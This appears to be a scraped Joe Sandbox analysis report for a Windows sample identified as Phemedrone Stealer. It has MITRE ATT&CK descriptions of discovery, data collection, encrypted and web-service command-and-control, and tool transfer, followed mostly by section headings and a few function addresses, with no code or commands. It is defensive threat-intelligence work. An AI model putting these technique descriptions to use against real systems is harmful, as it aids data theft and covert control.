Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report qqnal04.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Phemedrone Stealer

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\qqnal04.exe.log

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
qqnal04.exe

Function 00007FF848F18B68 Relevance: 2.2, Instructions: 2182
COMMON

Function 00007FF848F215F2 Relevance: 1.8, APIs: 1, Instructions: 256
encryptionCOMMON

Function 00007FF848F21110 Relevance: 1.8, APIs: 1, Instructions: 274
libraryCOMMON